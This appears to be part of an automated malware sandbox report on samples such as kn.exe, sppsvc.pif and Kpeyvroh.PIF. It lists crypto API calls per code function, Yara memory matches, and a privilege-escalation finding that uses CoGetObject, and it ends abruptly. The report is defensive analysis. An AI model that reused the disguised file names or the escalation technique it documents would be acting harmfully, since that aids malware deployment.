Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEB4A34 CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptHashCertificate2,CryptEncodeObjectEx,GetLastError,CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,GetLastError,GetLastError,#357,LocalFree,		25_2_00007FF67DEB4A34
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED4A1C NCryptIsKeyHandle,_wcsicmp,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,		25_2_00007FF67DED4A1C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED0A18 BCryptSetProperty,#205,#359,#357,#357,		25_2_00007FF67DED0A18
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF08C58 #357,LocalAlloc,#357,memmove,memset,BCryptFreeBuffer,#357,#357,#360,#359,#359,#359,LocalAlloc,memmove,LocalAlloc,memmove,#357,#357,CryptGetDefaultProviderW,LocalAlloc,CryptGetDefaultProviderW,GetLastError,#357,#357,#357,LocalFree,LocalFree,		25_2_00007FF67DF08C58
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBAA00 memset,memset,#357,#357,#357,#357,CryptEncodeObjectEx,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,#359,LocalFree,LocalFree,		25_2_00007FF67DEBAA00
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE9E9F0 IsDlgButtonChecked,memset,SendMessageW,LocalFree,GetDlgItemTextW,GetDlgItem,GetDlgItem,EnableWindow,LocalFree,#357,#357,CertFreeCertificateContext,CertFreeCTLContext,GetDlgItem,SendMessageW,SetDlgItemTextW,MessageBoxW,GetDlgItem,SendMessageW,GetDlgItemInt,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,#357,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetDlgItemTextW,SendDlgItemMessageA,CheckDlgButton,GetDlgItem,EnableWindow,SetDlgItemInt,CheckDlgButton,SetDlgItemTextW,SetDlgItemTextW,CertFreeCTLContext,CertFreeCertificateContext,??3@YAXPEAX@Z,memset,SendMessageW,MessageBoxW,memset,CryptUIDlgViewCRLW,memset,CryptUIDlgViewCertificateW,		25_2_00007FF67DE9E9F0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF14C80 CryptAcquireContextW,GetLastError,#357,CryptGenRandom,GetLastError,CryptGenRandom,GetLastError,memset,CryptReleaseContext,		25_2_00007FF67DF14C80
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE929A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,		25_2_00007FF67DE929A0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED099C BCryptOpenAlgorithmProvider,#205,#359,#359,		25_2_00007FF67DED099C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF02994 CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,		25_2_00007FF67DF02994
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF28CF4 GetLastError,#360,CryptGetProvParam,GetLastError,#360,#359,LocalAlloc,CryptGetProvParam,GetLastError,#357,LocalFree,CryptReleaseContext,GetLastError,LocalAlloc,CryptGetProvParam,GetLastError,#358,LocalFree,LocalFree,#357,CryptReleaseContext,LocalFree,		25_2_00007FF67DF28CF4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE5C960 LocalAlloc,CryptGetKeyIdentifierProperty,GetLastError,#357,LocalFree,LocalFree,		25_2_00007FF67DE5C960
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED8940 BCryptFinishHash,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,		25_2_00007FF67DED8940
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEDC940 _CxxThrowException,GetLastError,_CxxThrowException,memmove,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,CryptHashData,#205,GetLastError,#357,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,		25_2_00007FF67DEDC940
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF06D2C NCryptFreeBuffer,#360,		25_2_00007FF67DF06D2C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE92D18 #359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,		25_2_00007FF67DE92D18
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED0D14 NCryptFinalizeKey,#205,#357,#357,		25_2_00007FF67DED0D14
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEC2CF8 memset,#358,#357,CryptAcquireContextW,GetLastError,#357,#357,#358,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,DeleteFileW,LocalFree,#357,#357,#359,#359,LocalFree,LocalFree,#357,#357,#357,#357,#357,#359,#359,#359,#359,LocalFree,#359,#359,#357,		25_2_00007FF67DEC2CF8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED2CFC CryptDestroyKey,#205,GetLastError,#357,SetLastError,		25_2_00007FF67DED2CFC
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF06CE0 NCryptEnumStorageProviders,#360,		25_2_00007FF67DF06CE0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE94CC0 #357,lstrcmpW,CryptEnumKeyIdentifierProperties,GetLastError,#357,LocalFree,#357,#359,LocalFree,LocalFree,free,		25_2_00007FF67DE94CC0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEDACAC CryptContextAddRef,CryptDuplicateKey,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,??3@YAXPEAX@Z,		25_2_00007FF67DEDACAC
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEC4CA0 CryptAcquireCertificatePrivateKey,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CryptGetUserKey,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,		25_2_00007FF67DEC4CA0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF06C88 NCryptEnumAlgorithms,#360,		25_2_00007FF67DF06C88
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED2C80 CryptDestroyHash,#205,GetLastError,#357,SetLastError,		25_2_00007FF67DED2C80
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF0A9F0 strcmp,GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,#357,#357,NCryptIsAlgSupported,#360,#357,LocalAlloc,memmove,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,LocalFree,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,		25_2_00007FF67DF0A9F0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE36C4C CryptFindOIDInfo,#357,#357,#359,CryptFindOIDInfo,#357,LocalFree,		25_2_00007FF67DE36C4C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED0C3C NCryptExportKey,#205,#359,#359,#357,		25_2_00007FF67DED0C3C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF06C30 NCryptOpenStorageProvider,#360,		25_2_00007FF67DF06C30
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE6CC24 CryptDecodeObjectEx,#359,BCryptSetProperty,BCryptGetProperty,#357,BCryptDestroyKey,BCryptCloseAlgorithmProvider,		25_2_00007FF67DE6CC24
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF00BF4 CryptDuplicateHash,GetLastError,#357,CryptGetHashParam,GetLastError,#203,CryptDestroyHash,		25_2_00007FF67DF00BF4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED2BC0 CryptCreateHash,#205,GetLastError,#357,#357,#357,SetLastError,		25_2_00007FF67DED2BC0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEFCBB4 CryptGetProvParam,GetLastError,#358,LocalAlloc,#357,CryptGetProvParam,GetLastError,#357,LocalFree,		25_2_00007FF67DEFCBB4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE5CB98 NCryptIsKeyHandle,GetLastError,#358,#360,NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#359,LocalFree,NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,CryptGetKeyParam,GetLastError,#359,CryptDestroyKey,NCryptIsKeyHandle,#359,NCryptIsKeyHandle,		25_2_00007FF67DE5CB98
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF00B9C CryptHashData,GetLastError,#357,		25_2_00007FF67DF00B9C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED0B80 NCryptCreatePersistedKey,#205,#359,#359,#357,		25_2_00007FF67DED0B80
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF0A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,		25_2_00007FF67DF0A740
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEC2724 CryptDecodeObject,GetLastError,#357,		25_2_00007FF67DEC2724
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE726E0 #357,#357,LocalAlloc,memmove,memset,#357,BCryptFreeBuffer,#357,#357,#357,		25_2_00007FF67DE726E0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEF86D8 CertFindCertificateInStore,CryptAcquireCertificatePrivateKey,GetLastError,#359,CertFindCertificateInStore,GetLastError,#359,#357,CertFreeCertificateContext,		25_2_00007FF67DEF86D8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF066D8 NCryptFreeObject,#360,		25_2_00007FF67DF066D8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEA4694 CertFindAttribute,CryptHashCertificate2,memcmp,#357,		25_2_00007FF67DEA4694
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE66694 CryptQueryObject,GetLastError,#359,#357,#357,LocalFree,CertCloseStore,CryptMsgClose,		25_2_00007FF67DE66694
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF08814 NCryptIsKeyHandle,NCryptIsKeyHandle,#357,#359,#357,CryptFindOIDInfo,LocalAlloc,#357,LocalAlloc,#357,CryptFindOIDInfo,#359,LocalAlloc,#357,memmove,LocalFree,#357,		25_2_00007FF67DF08814
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF06654 NCryptGetProperty,#360,		25_2_00007FF67DF06654
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE9A654 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyTimeValidity,CertOpenStore,GetLastError,#357,CryptVerifyCertificateSignature,CertVerifyRevocation,GetLastError,#357,CertCloseStore,		25_2_00007FF67DE9A654
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE60630 #357,CryptDecodeObject,GetLastError,#357,GetLastError,GetLastError,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,		25_2_00007FF67DE60630
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE58600 #357,CryptDecodeObject,GetLastError,LocalFree,		25_2_00007FF67DE58600
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE925E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,		25_2_00007FF67DE925E8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE5C5D4 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#357,#357,#357,#357,LocalFree,LocalFree,		25_2_00007FF67DE5C5D4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF3E8B0 CryptDecodeObjectEx,GetLastError,CryptBinaryToStringW,GetLastError,memset,CryptBinaryToStringW,??3@YAXPEAX@Z,LocalFree,		25_2_00007FF67DF3E8B0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED65B4 NCryptIsKeyHandle,_CxxThrowException,		25_2_00007FF67DED65B4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DECE57C CertOpenStore,GetLastError,#357,CertAddEncodedCertificateToStore,GetLastError,#358,CryptFindCertificateKeyProvInfo,GetLastError,#358,#357,CertSetCTLContextProperty,GetLastError,CryptAcquireCertificatePrivateKey,GetLastError,CertSetCTLContextProperty,GetLastError,LocalFree,CertFreeCertificateContext,CertCloseStore,		25_2_00007FF67DECE57C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF04914 GetLastError,#359,CryptGetUserKey,CryptGetUserKey,GetLastError,#357,CryptDestroyKey,CryptReleaseContext,		25_2_00007FF67DF04914
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBE914 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,GetLastError,GetLastError,GetLastError,#357,CryptDestroyHash,		25_2_00007FF67DEBE914
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED08EC BCryptGetProperty,#205,#359,#357,#357,		25_2_00007FF67DED08EC
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF3A58C NCryptOpenStorageProvider,NCryptOpenKey,NCryptGetProperty,GetProcessHeap,HeapAlloc,NCryptGetProperty,NCryptFreeObject,NCryptFreeObject,		25_2_00007FF67DF3A58C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF0A590 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,		25_2_00007FF67DF0A590
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE4A8CC CryptFindLocalizedName,CertEnumCertificatesInStore,CertFindCertificateInStore,CertGetCRLContextProperty,#357,#357,#357,CertEnumCertificatesInStore,		25_2_00007FF67DE4A8CC
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED0844 BCryptExportKey,#205,#359,#357,#357,		25_2_00007FF67DED0844
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE56824 CryptHashCertificate,GetLastError,#357,		25_2_00007FF67DE56824
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBC7F0 GetLastError,#357,CertOpenStore,GetLastError,CertEnumCertificatesInStore,CertCompareCertificateName,CertFindExtension,CryptDecodeObject,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CertSetCTLContextProperty,GetLastError,#357,GetSystemTimeAsFileTime,I_CryptCreateLruEntry,GetLastError,#357,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,GetLastError,#357,CertEnumCertificatesInStore,I_CryptCreateLruEntry,GetLastError,#357,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,CertFreeCertificateChain,GetLastError,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,#357,CertCloseStore,CertFreeCertificateContext,		25_2_00007FF67DEBC7F0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED07F4 BCryptDestroyKey,#205,#357,		25_2_00007FF67DED07F4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE367CC LocalAlloc,#357,GetSystemTimeAsFileTime,LocalAlloc,#357,LocalAlloc,#357,memmove,memcmp,CryptEncodeObjectEx,memmove,LocalFree,GetLastError,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,		25_2_00007FF67DE367CC
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEE07D0 memset,#357,#360,#359,#357,#358,LoadCursorW,SetCursor,#360,#358,CertGetPublicKeyLength,GetLastError,#357,strcmp,GetLastError,#357,CryptFindOIDInfo,#357,#357,LocalFree,#357,LocalFree,#358,#358,#357,SetCursor,SetCursor,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,#357,#225,#359,#359,#357,#359,LocalFree,#359,#223,#359,#357,#223,#359,#359,#359,DialogBoxParamW,SysStringByteLen,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,SysFreeString,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,		25_2_00007FF67DEE07D0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEC27BC _strnicmp,#357,#357,#357,#357,CryptDecodeObject,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,		25_2_00007FF67DEC27BC
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED07A4 BCryptDestroyHash,#205,#357,		25_2_00007FF67DED07A4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED0740 BCryptCloseAlgorithmProvider,#205,#357,#357,		25_2_00007FF67DED0740
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE70300 NCryptOpenStorageProvider,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,NCryptFreeObject,#357,		25_2_00007FF67DE70300
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEA6280 #357,#254,#357,CertGetCRLContextProperty,GetLastError,memcmp,#254,#357,#360,#360,CertGetPublicKeyLength,GetLastError,#359,strcmp,GetLastError,CryptFindOIDInfo,#357,LocalFree,CryptFindOIDInfo,#357,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,		25_2_00007FF67DEA6280
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEF2278 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,LocalAlloc,memmove,#357,#357,CryptDestroyHash,CryptReleaseContext,		25_2_00007FF67DEF2278
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEFE274 GetLastError,#358,CryptAcquireCertificatePrivateKey,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,NCryptIsKeyHandle,GetLastError,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,		25_2_00007FF67DEFE274
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF08404 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,		25_2_00007FF67DF08404
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DECE1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,		25_2_00007FF67DECE1F8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBA1E8 LocalFree,CryptHashCertificate2,CertGetCRLContextProperty,CertGetNameStringA,memmove,memmove,GetLastError,GetLastError,#357,GetLastError,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,memmove,GetLastError,#357,GetLastError,#359,LocalFree,		25_2_00007FF67DEBA1E8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEF61AC SysStringLen,SysStringLen,CryptStringToBinaryW,GetLastError,#357,		25_2_00007FF67DEF61AC
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE721A4 #360,#359,#357,#357,BCryptFreeBuffer,		25_2_00007FF67DE721A4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEB6194 CryptQueryObject,GetLastError,CertEnumCertificatesInStore,CertAddStoreToCollection,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,		25_2_00007FF67DEB6194
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE9417C #360,#360,#359,#357,#357,#357,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,LocalFree,LocalFree,LocalFree,CryptDestroyKey,		25_2_00007FF67DE9417C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF3613C CryptDecodeObjectEx,		25_2_00007FF67DF3613C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEFE516 ??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,NCryptIsKeyHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,		25_2_00007FF67DEFE516
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE5C514 CryptGetProvParam,SetLastError,LocalAlloc,LocalFree,		25_2_00007FF67DE5C514
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE444E0 #357,#256,#357,GetLastError,CryptImportPublicKeyInfoEx2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalAlloc,GetLastError,memmove,BCryptVerifySignature,BCryptVerifySignature,BCryptDestroyKey,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,		25_2_00007FF67DE444E0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEA24D4 #357,CertCompareCertificateName,CertCompareCertificateName,GetSystemTime,SystemTimeToFileTime,GetLastError,#357,CompareFileTime,CompareFileTime,CompareFileTime,CompareFileTime,CryptVerifyCertificateSignature,GetLastError,#357,strcmp,strcmp,#357,#357,#357,CertCompareCertificateName,#357,CertCompareCertificateName,#357,CertFreeCTLContext,		25_2_00007FF67DEA24D4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEC8488 #357,CertGetCertificateChain,GetLastError,LocalAlloc,CertGetCRLContextProperty,GetLastError,GetLastError,GetLastError,CryptAcquireContextW,GetLastError,memset,CryptMsgOpenToEncode,GetLastError,CryptMsgUpdate,GetLastError,#357,#357,CryptReleaseContext,CryptMsgClose,CertCloseStore,CertFreeCertificateChain,LocalFree,LocalFree,LocalFree,		25_2_00007FF67DEC8488
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF0A1F8 LocalAlloc,CryptEnumProvidersA,GetLastError,#358,LocalFree,#357,		25_2_00007FF67DF0A1F8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF36214 CryptDecodeObjectEx,CryptDecodeObjectEx,SetLastError,		25_2_00007FF67DF36214
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEAA450 #357,#358,#357,#223,SetLastError,SetLastError,memmove,memmove,#357,#357,GetLastError,#357,#357,strcmp,GetLastError,strcmp,strcmp,strcmp,qsort,#357,CompareFileTime,CompareFileTime,#357,#357,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertCloseStore,CertCloseStore,CertFreeCTLContext,LocalFree,free,		25_2_00007FF67DEAA450
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEAC450 CertOpenStore,GetLastError,#357,CryptQueryObject,CertAddStoreToCollection,GetLastError,#357,CertAddStoreToCollection,GetLastError,CertOpenStore,GetLastError,CertAddStoreToCollection,GetLastError,CertCloseStore,CertCloseStore,CertCloseStore,CertCloseStore,		25_2_00007FF67DEAC450
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE54410 GetUserDefaultUILanguage,GetSystemDefaultUILanguage,#357,#357,CryptFindOIDInfo,CryptEnumOIDInfo,#360,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,CryptEnumOIDInfo,#258,#358,#357,#357,#357,LocalFree,#224,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,		25_2_00007FF67DE54410
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE723E8 BCryptResolveProviders,#360,#360,BCryptFreeBuffer,		25_2_00007FF67DE723E8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF08298 #357,CryptFindOIDInfo,LocalAlloc,#357,memmove,		25_2_00007FF67DF08298
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE5E3B0 #357,#357,CryptDecodeObject,LocalFree,		25_2_00007FF67DE5E3B0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF3A2E0 NCryptOpenStorageProvider,NCryptOpenKey,NCryptFreeObject,		25_2_00007FF67DF3A2E0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEC6374 memset,#358,#357,LocalFree,LocalFree,#357,#357,_strlwr,#357,LocalFree,LocalFree,lstrcmpW,#359,#359,#357,CryptAcquireContextW,GetLastError,#256,CryptGenRandom,GetLastError,#254,#357,fopen,fopen,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,LocalAlloc,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,#357,LocalFree,#357,fprintf,fprintf,CertOpenStore,GetLastError,LocalAlloc,CertSaveStore,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,fclose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,CryptReleaseContext,fprintf,fprintf,fflush,ferror,		25_2_00007FF67DEC6374
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEC2358 #357,#357,CryptReleaseContext,CryptReleaseContext,CertFreeCertificateContext,CertFreeCertificateContext,		25_2_00007FF67DEC2358
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA23837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,		28_2_1BA23837
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_21093837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,		36_2_21093837

Source: sppsvc.pif, 0000001C.00000002.4524424593.000000001BA5B000.00000040.00001000.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_1f2c415d-a

Exploits

Source: Yara match	File source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR

Privilege Escalation

Source: C:\Users\Public\Libraries\Kpeyvroh.PIF

Code function: 36_2_210674FD _wcslen,CoGetObject,

36_2_210674FD

Source: C:\Users\Public\ger.exe

